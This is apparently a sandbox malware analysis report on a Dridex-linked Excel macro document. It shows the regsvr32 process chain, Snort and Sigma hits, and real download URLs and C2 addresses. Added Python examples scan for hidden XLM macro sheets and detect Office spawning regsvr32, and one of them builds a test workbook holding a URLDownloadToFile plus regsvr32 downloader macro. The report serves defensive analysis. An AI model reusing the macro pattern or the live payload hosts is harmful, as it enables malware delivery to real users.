
Analysis Report: printouts of outstanding as of 01_20_2021.xlsm

Overview

General Information

Sample Name: printouts of outstanding as of 01_20_2021.xlsm
Analysis ID: 342170
MD5: 28e9c78dcffb4a80c7bcfcd818791940
SHA1: 0f239865c9e2bdd64d2017c7d26cac19dc7d3cde
SHA256: 09cceb619174c99d026734f860f26cda0107af31b9153a9f7d6613c86fd57772

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
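The "Hidden Macro 4.0" verdict and the "Found Excel 4.0 Macro with suspicious formulas" signature above come from the structure of the OOXML package itself: an .xlsm stores Excel 4.0 (XLM) macros as xl/macrosheets/*.xml parts, referenced from xl/workbook.xml through a relationship of type xlMacrosheet; the sheet's state attribute (hidden or veryHidden) hides it from the Excel UI, and an Auto_Open defined name makes it run when the workbook is opened. The scanner below is an added example, not part of this report or of Joe Sandbox: it checks those three things offline and flags formulas that call Win32 APIs (CALL/REGISTER), start programs (EXEC) or mention URLDownloadToFile or regsvr32. The workbook it builds for itself is constructed here to exercise the scanner (placeholder URL and DLL name); it is not the analysed sample.

```python
"""Static triage of an OOXML workbook for hidden Excel 4.0 (XLM) macro sheets.

Added example; not part of the Joe Sandbox report. build_sample_xlsm() builds a
constructed workbook to exercise the scanner: it is not the analysed sample and
its URL and DLL name are placeholders.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

URI_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
URI_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
URI_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_MACROSHEET = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"

# XLM functions that reach Win32 APIs, run programs, or write files and formulas.
FUNC_RE = re.compile(r"\b(CALL|REGISTER|EXEC|FORMULA|FOPEN|FWRITE)\s*\(", re.I)
# Substrings matching the behaviour in the report: URLDownloadToFile, regsvr32 from %TEMP%.
STRING_HINTS = ("urldownloadtofile", "regsvr32", "rundll32", "\\temp\\")


def _part_name(target: str) -> str:
    """Resolve a workbook relationship Target (relative to xl/ or absolute) to a zip entry."""
    return target[1:] if target.startswith("/") else "xl/" + target


def scan_xlsm(data: bytes) -> dict:
    """Return XLM macro sheets, which of them are hidden, the Auto_Open target and suspicious formulas."""
    out = {"macrosheets": [], "hidden_macrosheets": [], "auto_open": None, "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "xl/workbook.xml" not in names:
            return out
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = {}  # rId -> part name, only for relationships of the xlMacrosheet type
        if "xl/_rels/workbook.xml.rels" in names:
            rel_xml = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
            for rel in rel_xml.iter(f"{{{URI_PKG}}}Relationship"):
                if rel.get("Type") == REL_MACROSHEET:
                    rels[rel.get("Id")] = _part_name(rel.get("Target"))
        for sheet in wb.iter(f"{{{URI_MAIN}}}sheet"):
            rid = sheet.get(f"{{{URI_R}}}id")
            if rid not in rels:
                continue  # ordinary worksheet
            entry = {"name": sheet.get("name"), "part": rels[rid], "state": sheet.get("state", "visible")}
            out["macrosheets"].append(entry)
            if entry["state"] in ("hidden", "veryHidden"):  # veryHidden cannot be unhidden from the UI
                out["hidden_macrosheets"].append(entry["name"])
        for dn in wb.iter(f"{{{URI_MAIN}}}definedName"):
            if "auto_open" in (dn.get("name") or "").lower():  # XLM auto-execution entry point
                out["auto_open"] = dn.text
        for entry in out["macrosheets"]:
            if entry["part"] not in names:
                continue
            for cell in ET.fromstring(z.read(entry["part"])).iter(f"{{{URI_MAIN}}}c"):
                formula = cell.find(f"{{{URI_MAIN}}}f")
                if formula is None or not formula.text:
                    continue
                text = formula.text
                if FUNC_RE.search(text) or any(h in text.lower() for h in STRING_HINTS):
                    out["suspicious"].append((entry["name"], cell.get("r"), text))
    return out


def is_malicious(findings: dict) -> bool:
    """Hidden Macro 4.0 verdict: a hidden XLM sheet that auto-starts or carries dangerous formulas."""
    hidden = bool(findings["hidden_macrosheets"])
    return hidden and (findings["auto_open"] is not None or bool(findings["suspicious"]))


def build_sample_xlsm() -> bytes:
    """Constructed workbook: a visible worksheet plus a veryHidden XLM sheet wired to Auto_Open."""
    formulas = [  # placeholder URL and DLL name, modelled on the report's URLDownloadToFile + regsvr32 chain
        'CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p.zip",'
        '"C:\\Users\\user\\AppData\\Local\\Temp\\payload.dll",0,0)',
        'EXEC("regsvr32 -s C:\\Users\\user\\AppData\\Local\\Temp\\payload.dll")',
        "HALT()",
    ]
    rows = "".join(f'<row r="{i}"><c r="A{i}"><f>{fx}</f></c></row>' for i, fx in enumerate(formulas, 1))
    parts = {
        "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>'
        "</Types>",
        "xl/workbook.xml": f'<workbook xmlns="{URI_MAIN}" xmlns:r="{URI_R}"><sheets>'
        '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets>'
        '<definedNames><definedName name="Auto_Open">Macro1!$A$1</definedName></definedNames></workbook>',
        "xl/_rels/workbook.xml.rels": f'<Relationships xmlns="{URI_PKG}">'
        f'<Relationship Id="rId1" Type="{URI_R}/worksheet" Target="worksheets/sheet1.xml"/>'
        f'<Relationship Id="rId2" Type="{REL_MACROSHEET}" Target="macrosheets/sheet1.xml"/></Relationships>',
        "xl/worksheets/sheet1.xml": f'<worksheet xmlns="{URI_MAIN}"><sheetData/></worksheet>',
        "xl/macrosheets/sheet1.xml": f'<xm:macrosheet xmlns="{URI_MAIN}" '
        f'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>{rows}</sheetData></xm:macrosheet>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_xlsm(build_sample_xlsm())
    print("hidden XLM sheets:", result["hidden_macrosheets"], "Auto_Open:", result["auto_open"])
    for sheet, cell, text in result["suspicious"]:
        print(f"  {sheet}!{cell}: {text}")
    print("verdict:", "Hidden Macro 4.0" if is_malicious(result) else "clean")
```

Run it against a real workbook with scan_xlsm(open(path, "rb").read()). A veryHidden macro sheet is the strongest single indicator because Excel's own UI offers no way to unhide it; a visible XLM sheet with only benign formulas is legitimate legacy content and is deliberately not flagged.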

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2496 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2316 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1204 cmdline: -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2348 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 972 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1664 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2684 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2940 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2848 cmdline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2428 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2424 cmdline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2400 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2372 cmdline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2536 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2408 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1428 cmdline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2456 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 856 cmdline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load (author: Florian Roth)
Sigma detected: Microsoft Office Product Spawning Windows Shell (authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team)
Sigma detected: Regsvr32 Anomaly (author: Florian Roth)
All three rules matched the same process-start event:
  Source: Process started
  Command / CommandLine / ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\regsvr32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 552
  ProcessId: 2496
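The three Sigma matches key on one event: EXCEL.EXE (PID 552) starting regsvr32.exe with -s and a DLL in the user's Temp directory, and the Startup tree shows the same regsvr32 then spawning a second regsvr32 whose logged command line is only "-s <dll>". The script below is an added example, neither part of the report nor the text of the cited Sigma rules: it implements equivalent conditions over process-creation events and walks the parent chain for triage output. SAMPLE_EVENTS is constructed from the Startup tree on this page (the image path of the nested regsvr32, PID 1204, is an assumption; the report gives only its command line and a different MD5), plus a constructed benign regsvr32 launch as a control.

```python
"""Detection logic for the Office -> regsvr32 -> regsvr32 chain in the Startup section.

Added example, not from the report or from the Sigma rules it cites; the conditions
are modelled on what those rules look for, not their text. SAMPLE_EVENTS is built
from the process tree on this page; the image path of PID 1204 is an assumption.
"""
import re
from collections import defaultdict

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe", "mspub.exe", "outlook.exe", "eqnedt32.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "certutil.exe", "msiexec.exe"}
# Directories an unprivileged user can write to; a COM server registered from here is anomalous.
USER_WRITABLE = re.compile(r"\\(temp|appdata|programdata|users\\public|downloads)\\", re.I)
# regsvr32 loading a "DLL" whose extension says otherwise (content/extension mismatch).
ODD_EXT = re.compile(r"\.(jpg|jpeg|png|gif|bmp|txt|tmp|dat)(?=['\"\s]|$)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) alerts for a list of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        cmd = e["cmd"]
        if pimg in OFFICE and img in LOLBINS:
            alerts.append(("office_spawning_shell", e["pid"]))
        if img == "regsvr32.exe" and (USER_WRITABLE.search(cmd) or ODD_EXT.search(cmd) or pimg in OFFICE):
            alerts.append(("regsvr32_anomaly", e["pid"]))
        if img == "regsvr32.exe" and pimg == "regsvr32.exe" and cmd.lstrip().startswith(("-", "/")):
            # The report logs the nested regsvr32 with a different MD5 and only "-s <dll>" as its
            # command line; regsvr32 re-launching regsvr32 is the signal regardless of the cause.
            alerts.append(("nested_regsvr32", e["pid"]))
    return alerts


def ancestry(events, pid):
    """Walk up from pid to the root and return image basenames, oldest first, for triage output."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def rules_by_pid(alerts):
    grouped = defaultdict(set)
    for rule, pid in alerts:
        grouped[pid].add(rule)
    return grouped


TEMP = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_EVENTS = [  # constructed from the Startup tree on this page
    {"pid": 552, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmd": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2496, "ppid": 552, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": rf"'C:\Windows\System32\regsvr32.exe' -s {TEMP}\zsijkwsd.dll"},
    {"pid": 2316, "ppid": 552, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": rf"'C:\Windows\System32\regsvr32.exe' -s {TEMP}\zsijkwsd.dll"},
    # Image path assumed; the report shows only the argument-only command line and a different MD5.
    {"pid": 1204, "ppid": 2316, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": rf"-s {TEMP}\zsijkwsd.dll"},
    # Constructed benign control: a COM server registered from Program Files by a non-Office parent.
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"'C:\Windows\System32\regsvr32.exe' /s 'C:\Program Files\Vendor\app.dll'"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:24} pid={pid:<5} chain={' -> '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

The benign control registers a DLL from Program Files under explorer.exe and produces no alert, while every regsvr32 in the Excel chain trips at least two rules; in production, feed detect() from Sysmon Event ID 1 or Windows 4688 records with the same pid/ppid/image/cmd fields.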

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://cms.ivpr.org/by9zwa7p1.zip; Avira URL Cloud: Label: malware
Source: http://monitrade.net/h79fwesfe.rar; Avira URL Cloud: Label: malware
Source: http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip; Avira URL Cloud: Label: malware
Source: http://laureys.be/uzssv27.rar; Avira URL Cloud: Label: malware
Source: http://artec.com.tr/xkpffwn.zip; Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: printouts of outstanding as of 01_20_2021.xlsm; Virustotal: Detection: 24%
Source: printouts of outstanding as of 01_20_2021.xlsm; ReversingLabs: Detection: 11%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown. HTTPS traffic detected from 194.225.58.214:443 to 192.168.2.22, version TLS 1.0, on local ports 49171, 49170, 49179, 49183, 49186, 49187, 49191, 49192, 49199, 49204, 49209, 49212, 49216, 49222, 49225, 49228, 49232, 49238, 49241, 49244, 49246, 49249, 49256, 49257, 49260, 49264, 49270, 49271, 49279, 49283, 49288, 49293, 49294, 49286, 49302, 49305, 49309 (37 connections, each logged by the sandbox as a separate "HTTPS traffic detected" entry).
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: h79fwesfe[1].rar.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll; origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: monitrade.net
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.2.22:49170 -> 194.225.58.214:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 192.185.147.185:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic. Every alert is "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)" on traffic from one of three remote endpoints to 192.168.2.22; the sandbox logs one alert per connection, listed here grouped by remote endpoint and Snort SID with the local port of each connection:
  • SID 2023476, 194.225.58.214:443 -> 192.168.2.22, local ports 49171, 49170, 49179, 49183, 49186, 49187, 49191, 49192, 49199, 49204, 49209, 49212, 49216, 49222, 49225, 49228, 49232, 49238, 49241, 49244, 49246, 49249, 49256, 49257, 49260, 49264, 49270, 49271, 49279, 49283, 49288, 49293, 49294, 49286, 49302
  • SID 2023476, 211.110.44.63:5353 -> 192.168.2.22, local ports 49173, 49174, 49182, 49184, 49193, 49194, 49196, 49200, 49203, 49207, 49210, 49215, 49219, 49224, 49227, 49231, 49235, 49240, 49243, 49248, 49252, 49253, 49259, 49263, 49266, 49269, 49275, 49276, 49282, 49287, 49292, 49297, 49298, 49301
  • SID 2023476 and SID 2022535 (both fire on every connection to this host), 198.57.200.100:3786 -> 192.168.2.22, local ports 49177, 49180, 49188, 49190, 49197, 49202, 49208, 49206, 49213, 49218, 49220, 49223, 49229, 49234, 49236, 49239, 49245, 49251, 49254, 49258, 49265, 49267, 49273, 49278, 49280, 49281, 49289, 49290, 49296, 49299, 49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49310
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 69.164.207.140:3388
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 198.57.200.100:3786
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 20 Jan 2021 15:13:16 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, Keep-Alive | Last-Modified: Tue, 12 Jan 2021 11:40:23 GMT | Accept-Ranges: bytes | Content-Length: 765440 | Keep-Alive: timeout=5, max=75 | Content-Type: application/x-rar-compressed
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 20 Jan 2021 15:13:25 GMT | Server: Apache | Last-Modified: Mon, 11 Jan 2021 21:14:58 GMT | Accept-Ranges: bytes | Content-Length: 765440 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/zip
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 20 Jan 2021 15:14:27 GMT | Server: Apache | Strict-Transport-Security: max-age=63072000; includeSubdomains; | X-Frame-Options: SAMEORIGIN | Last-Modified: Thu, 14 Jan 2021 04:03:15 GMT | Accept-Ranges: bytes | Content-Length: 765440 | Cache-Control: max-age=2592000 | Expires: Fri, 19 Feb 2021 15:14:27 GMT | Keep-Alive: timeout=5, max=50 | Connection: Keep-Alive | Content-Type: application/zip
Source: Joe Sandbox View | IP Address: 198.57.200.100
Source: Joe Sandbox View | IP Address: 69.164.207.140
Source: Joe Sandbox View | JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global traffic | HTTP traffic detected: GET /h79fwesfe.rar HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: monitrade.net | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ys95lm6k.rar HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: bafnabrotherskesarwala.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xkpffwn.zip HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: artec.com.tr | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ylztwx.rar HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.gastronauts.asia | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uzssv27.rar HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: laureys.be | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: laureys.be | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /by9zwa7p1.zip HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: cms.ivpr.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /d8ms3mljy.zip HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: salaodigitalautomovel.pt.deve.pt | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
